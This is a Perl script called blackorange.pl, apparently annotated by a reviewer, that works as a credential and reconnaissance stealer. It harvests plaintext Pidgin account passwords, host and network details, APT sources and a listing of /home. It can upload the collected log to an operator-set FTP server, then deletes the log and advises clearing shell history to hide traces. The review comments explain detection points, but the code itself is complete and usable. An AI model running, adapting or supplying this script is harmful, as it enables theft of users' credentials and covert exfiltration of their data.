
#!

/usr/bin/perl
# blackorange.pl
# Mal
# Not liable should anything happen.
use strict;
use Term::ANSIColor qw/:constants/;
use Net::FTP;
use Sys::Hostname;
use Digest::MD5;
use Config;
use Socket;
use File::Find;
use ExtUtils::Installed;
# Upload destination for -mode:ftp. All four values are empty as published, and
# the argument check further down exits with "Missing FTP information." while
# any of them is still ''. That includes $ftp_destdir, even though its comment
# says it may be left blank for some servers.
# NOTE(review): the values sit in the script in cleartext, so a recovered copy
# with them filled in names the collection server and the account used on it.
# Change these to your FTP server
my $ftp_addr = ''; # The IP/address to the FTP
my $ftp_user = ''; # FTP username
my $ftp_pw = ''; # FTP password
# The line after the next one is the tail of its trailing comment; the page
# extraction wrapped it onto a line of its own.
my $ftp_destdir = ''; # Destination in FTP, can be left blank for Windows FTP Se
rvers, but not for Linux FTP Servers.
#####################################
# Values gathered once at start-up; most of them are written to the log by
# basicinformation().
my $VER = "0.2"; # version shown in the banner
# localtime in scalar context gives a ctime-style string. It is interpolated
# into every "BlackOrangeUpload_$time.txt" path, so the log's file name carries
# the start time, including its spaces and colons.
my $time = scalar(localtime);
my $parent_pid = getppid(); # PID of the process that launched the script
my $child_pid = getpgrp(0); # process-group ID of this process; logged as "ScriptPID"
my $cuser = getlogin(); # login name reported for the session
my $os = $^O; # OS name this perl was built for
my $p_ver = $]; # numeric perl version
my $apt_loc = "/etc/apt/sources.list"; # file read by aptsources()
my $hostname = hostname;
# Built from the login name; assumes the home directory is /home/<user>.
my $pidgindir = "/home/$cuser/.purple";
my $arch = $Config{archname};
my $envpath = $ENV{PATH};
# First address the resolver returns for the local host name.
# NOTE(review): may be a loopback address depending on the hosts file; confirm.
my $localip = inet_ntoa( (gethostbyname($hostname))[4]);
# Set by the argument check: 0 for -mode:local, 1 for -mode:ftp.
my $mode = undef;
# Command-line handling. Only the first argument is examined.
#   -mode:local  -> $mode = 0
#   -mode:ftp    -> $mode = 1, but only when all four FTP settings are non-empty
#   -h           -> help(), which prints the usage text and exits
# Anything else, including no argument at all, prints a usage hint and exits.
# The mode pattern is anchored only at the start, so non-word text following
# the mode name is ignored.
if($ARGV[0] =~ /^\-mode\:(\w+)/) {
if($1 eq 'local') {
$mode = 0;
} elsif($1 eq 'ftp') {
$mode = 1;
# Refuse to collect anything when the upload target is incomplete.
if( ($ftp_addr eq '') || ($ftp_user eq '') || ($ftp_pw eq '') ||
($ftp_destdir eq '')) {
print BOLD, RED, "Missing FTP information.\n", RESET;
exit;
}
} else {
print BOLD, RED, "Unknown mode.\n", RESET;
exit;
}
} elsif($ARGV[0] eq '-h') {
help();
}else{
print BOLD, BLUE, "Type 'perl blackorange.pl -h'\n", RESET;
exit;
}
# Clear the terminal by running the external `clear` command, print the banner,
# and create the log file in the current working directory with its title line.
# The open is two-argument with a bareword handle and its result is not
# checked; every later sub reopens the same relative path.
# NOTE(review): a file named BlackOrangeUpload_<start time>.txt appearing in a
# working directory is the on-disk artifact of a run.
system "clear";
print BOLD, BLUE "Black Orange v$VER\n\n", RESET;
open IDLOG, ">>BlackOrangeUpload_$time.txt";
print IDLOG "BLACKORANGEUPLOAD LOG\n\n";
close(IDLOG);
# help: print the built-in usage text to STDOUT and terminate the script.
# Takes no arguments and never returns to the caller (it ends with exit).
# The text itself lists what the script collects: basic host details, saved
# Pidgin passwords, ifconfig/iwconfig output and the /home directory tree.
# Some lines of the here-document are split mid-word; that is how the page
# extraction wrapped them.
sub help() {
print <<OEF;
NAME
blackorange.pl - system checker
SYNOPSIS
perl blackorange.pl -mode:option
DESCRIPTION
Use this script to log information on a system. This script checks for nume
rous
things such as the basic information of the system (hostname, user, etc) an
d
pidgin passwords stored on the computer. The script also logs the output of
iwconfig and ifconfig, along with the directory-tree of /home.
OPTIONS
local - Saves log to local hard drive
ftp - Uploads log to ftp server
EXAMPLES
perl blackorange.pl -mode:local
perl blackorange.pl -mode:ftp
NOTES
This script works best on Debian-based Linux distributions. For the full lo
gging,
the script looks for /etc/apt/sources.list and logs it (this is found on De
bian-
based distributions).
BUGS
None found during testing.
OEF
exit;
}
# notremote: end of a -mode:local run. Prints a status line and exits.
# Because the script stops here, the ftp() and finalize() calls at the bottom
# of the file are never reached in local mode, so the log file is left in the
# working directory.
sub notremote() {
print BOLD, BLUE, "User chose local.\n", RESET;
exit;
}
# perlmodules: append the list of installed Perl modules to the log.
# Uses ExtUtils::Installed to enumerate the modules and writes one
# "module - version" line per entry. Takes no arguments; the progress message
# goes to STDOUT and the open of the log is not checked.
sub perlmodules() {
open IDLOG, ">>BlackOrangeUpload_$time.txt";
print IDLOG "\nINSTALLED PERL MODULES (MODULE - VERSION)\n";
print "\nLogging installed Perl Modules.. ";
my $pm = ExtUtils::Installed->new();
foreach my $modules ($pm->modules()) {
my $version = $pm->version($modules);
print IDLOG " $modules - $version\n";
}
close(IDLOG);
}
# filetree: append a recursive listing of /home to the log.
# File::Find walks the tree and the callback writes each path it visits, one
# per line. Only names are recorded; no file contents are read here.
# NOTE(review): the walk touches every directory under /home that the running
# user can enter, which shows up as a burst of directory reads from one perl
# process.
sub filetree() {
open IDLOG, ">>BlackOrangeUpload_$time.txt";
my $directory = "/home";
print IDLOG "\n\n/HOME/* DIRECTORY TREE LISTING\n";
print "\nLogging '/home/*' Directory Tree.. ";
find sub { print IDLOG " $File::Find::name\n"}, $directory;
print "done.\n";
close(IDLOG);
}
# networkinfo: append the output of /sbin/ifconfig and /sbin/iwconfig to the log.
# Each tool is run through backticks only if the file exists at that fixed
# path; its output lines are copied to the log unchanged apart from a leading
# space. Returns 0 when iwconfig is absent. The log handle is not closed in
# this sub.
# NOTE(review): both tools run as child processes of the perl interpreter,
# which process-creation logging will record.
sub networkinfo() {
open IDLOG, ">>BlackOrangeUpload_$time.txt";
print "\nSearching ifconfig.. ";
my $tmpf;
if(-e '/sbin/ifconfig') {
print IDLOG "\n\n/SBIN/IFCONFIG INFORMATION\n";
print BOLD, BLUE, "found.\n", RESET;
# Capture the command's full output, one list element per line.
my @ethinfof = `/sbin/ifconfig`;
foreach $tmpf (@ethinfof) {
print IDLOG " $tmpf";
}
} else {
print BOLD, RED, "not found.\n", RESET;
}

print "Searching iwconfig.. ";


my $tmpw;
if(-e '/sbin/iwconfig') {
print IDLOG "\n/SBIN/IWCONFIG INFORMATION\n";
print BOLD, BLUE, "found.\n", RESET;
my @ethinfow = `/sbin/iwconfig`;
foreach $tmpw (@ethinfow) {
print IDLOG " $tmpw";
}
} else {
print BOLD, RED, "not found.\n", RESET;
return 0;
}
}
# aptsources: append the APT source list ($apt_loc) and its MD5 digest to the log.
# The file is opened twice: one handle feeds Digest::MD5, the other is read
# line by line. Lines that begin with whitespace (blank lines included) are
# skipped; every other line is copied and counted in $c. Returns 0 early when
# the file does not exist, in which case the log handle is left open.
sub aptsources() {
open IDLOG, ">>BlackOrangeUpload_$time.txt";
my $c;
print "\n[Debian-based] Searching APT Sources.. ";
if(-e $apt_loc) {
print BOLD, BLUE, "found.\n", RESET;
open APTMD5, "$apt_loc";
open APT, "$apt_loc";
my $sources = Digest::MD5->new;
$sources->addfile(*APTMD5);
my $md5_sources = $sources->hexdigest;
# The next statement is split across two lines by the page extraction; the
# interpolated variable is $md5_sources.
print IDLOG "\n\nDEBIAN-BASED LINUX: SYSTEM APT SOURCES (MD5:$md
5_sources)\n";
while(<APT>) {
next if /^\s+/;
$c++;
print IDLOG " $_";
}
} else {
print BOLD, RED, "not found.\n", RESET;
return 0;
}
print " - Found $c lines(s)\n";
close(IDLOG);
close(APT);
close(APTMD5);
}
# ftp: upload the finished log to the configured FTP server.
# Steps, each reported on STDOUT: connect, log in, change to $ftp_destdir,
# put() the log file by name, quit. Any failing step calls failed(), which
# prints "failed." and runs finalize(), and then dies. The IDLOG handle opened
# here is not used for the transfer.
# NOTE(review): Net::FTP is created without any TLS option, so the login and
# the uploaded file travel as plain FTP. The credentials and a transfer of a
# BlackOrangeUpload_*.txt file are therefore visible to network monitoring.
sub ftp() {
open IDLOG, "BlackOrangeUpload_$time.txt";
print "\nFTP Upload..\n";
print " Connecting.. ";
my $ftp = Net::FTP->new("$ftp_addr") or die failed();
print BOLD, BLUE, "success.\n", RESET;
print " Authenticating.. ";
$ftp->login("$ftp_user", "$ftp_pw") or die failed();
print BOLD, BLUE, "success.\n", RESET;
print " Changing working directory.. ";
$ftp->cwd("$ftp_destdir") or die failed();
print BOLD, BLUE, "success.\n", RESET;
print " Uploading.. ";
$ftp->put("BlackOrangeUpload_$time.txt") or die failed();
print BOLD, BLUE, "success.\n", RESET;
print "Killing FTP Connection.\n\n";
$ftp->quit;
close(IDLOG)
}

# basicinformation: append the host summary to the log.
# Writes the values captured at start-up (user, host name, local IPv4, OS,
# architecture, perl version, process IDs, start time, PATH) and every line of
# /etc/issue that does not begin with whitespace as a "Distribution" entry.
# Always returns 0. The DISTRO handle is not closed, and neither open is checked.
sub basicinformation() {
open IDLOG, ">>BlackOrangeUpload_$time.txt";
open DISTRO, "/etc/issue";
my $DISTRO;
print "Logging basic system information.. \n";
print IDLOG "BASIC SYSTEM INFORMATION\n";
print IDLOG " - User : $cuser\n";
print IDLOG " - Host : $hostname\n";
print IDLOG " - Local IPv4 : $localip\n";
# \u upper-cases the first character of the OS name.
print IDLOG " - OS : \u$os\n";
while(<DISTRO>) {
# Skip blank and indented lines; (.*) then captures the line without its newline.
if($_ !~ /^\s+/) {
if( ($DISTRO) = $_ =~ /(.*)/) {
$DISTRO = $1;
print IDLOG " - Distribution: $DISTRO\n";
}
}
}
print IDLOG " - Architecture: $arch\n";
print IDLOG " - Perl Version: $p_ver\n";;
# "ScriptPID" holds the getpgrp(0) value, "ScriptParent" the getppid() value.
print IDLOG " - ScriptPID : $child_pid\n";
print IDLOG " - ScriptParent: $parent_pid\n";
print IDLOG " - ScriptEXEC : $time\n";
print IDLOG " - Env Path : $envpath\n";
close(IDLOG);
return 0;
}
# pidginaccounts: copy saved Pidgin account records into the log.
# Reads $pidgindir/accounts.xml, computes its MD5 digest, then scans it line by
# line for <name>, <protocol> and <password> elements. Each <password> element
# found writes one "Profile" record using the most recently seen protocol and
# name. Returns 0 in all cases, including when the file does not exist.
# NOTE(review): Pidgin keeps saved passwords in this file in plaintext, and the
# read needs only the logged-in user's own access. Not saving passwords in the
# client, and auditing reads of ~/.purple/accounts.xml by processes other than
# Pidgin, are the relevant controls.
sub pidginaccounts() {
open IDLOG, ">>BlackOrangeUpload_$time.txt";;
print IDLOG "\n\n";
# The file is opened and hashed before the existence test further down.
open AXML, "$pidgindir/accounts.xml";
my $axml = Digest::MD5->new;
$axml->addfile(*AXML);
my $md5_xml = $axml->hexdigest;
my ($an,$ac,$ap,$pc,$apr,$prc,$pre);
my (@a, @p, @pr);
# Element names interpolated into the patterns below.
my $n = "name";
my $pr = "protocol";
my $pw = "password";
print "\nSearching Pidgin... ";
if(-e "$pidgindir/accounts.xml") {
print BOLD, BLUE, "found.\n", RESET;
} else {
print BOLD, RED, "not found.\n", RESET;
return 0;
}
open ACCT, "$pidgindir/accounts.xml";
print IDLOG "\nPIDGIN INFORMATION (MD5:$md5_xml)\n";
while(<ACCT>) {
# Remove all whitespace so each element can be matched against the whole line.
s/\s+//g;
if( ($an) = $_ =~ /^<$n>(.*)<\/$n>$/) {
@a = $an;
# The protocol value is split at its last hyphen; only the part after it is kept.
}elsif( ($pre, $apr) = $_ =~ /^<$pr>(.*)-(.*)<\/$pr>$/) {
@pr = $apr;
}elsif( ($ap) = $_ =~ /^<$pw>(.*)<\/$pw>$/) {
$pc++;
@p = $ap;
print IDLOG " Profile $pc\n";
print IDLOG " Protocol : @pr\n";
print IDLOG " Account : @a\n";
print IDLOG " Password: @p\n";
}
}
print " - Found $pc saved accounts(s)\n";
close(IDLOG);
return 0;
}
# failed: error path for the FTP steps. Prints "failed." in red and runs
# finalize(), so the local log is removed even when the upload did not complete.
# Called as the argument of die in ftp(), so the script ends right afterwards.
sub failed() {
print BOLD, RED, "failed.\n", RESET;
finalize();
}
# finalize: clean-up step, run after an FTP upload or from failed().
# Unlinks the local log file and prints a confirmation, then tells the operator
# how to clear the shell history by hand. The only path passed to unlink is the
# log file, although the message text says "Script".
# NOTE(review): after an ftp-mode run the log is no longer on disk, so host-side
# evidence is more likely to come from process, file-access and network
# telemetry than from the file itself.
sub finalize() {
print "Erasing traces..\n";
open IDLOG, ">>BlackOrangeUpload_$time.txt";
print " - Deleted Local Script.\n" if unlink("BlackOrangeUpload_$time.txt"
);
print BOLD, BLUE, " - To erase CLI history, type 'history -c'\n", RESET;
close(IDLOG);
}
# Main sequence: every collector runs in both modes and appends its section to
# the log in this order. In local mode notremote() exits, so the log stays on
# disk; in ftp mode the log is uploaded and then unlinked by finalize().
# The second line of the comment below is its wrapped tail from the page
# extraction.
## Subroutines in order. Change them around if you know what you're doing. (It'l
l change how it looks in the text output).
basicinformation();
pidginaccounts();
aptsources();
networkinfo();
perlmodules();
filetree();
notremote() if $mode == 0;
ftp() if $mode == 1;
finalize() if $mode == 1;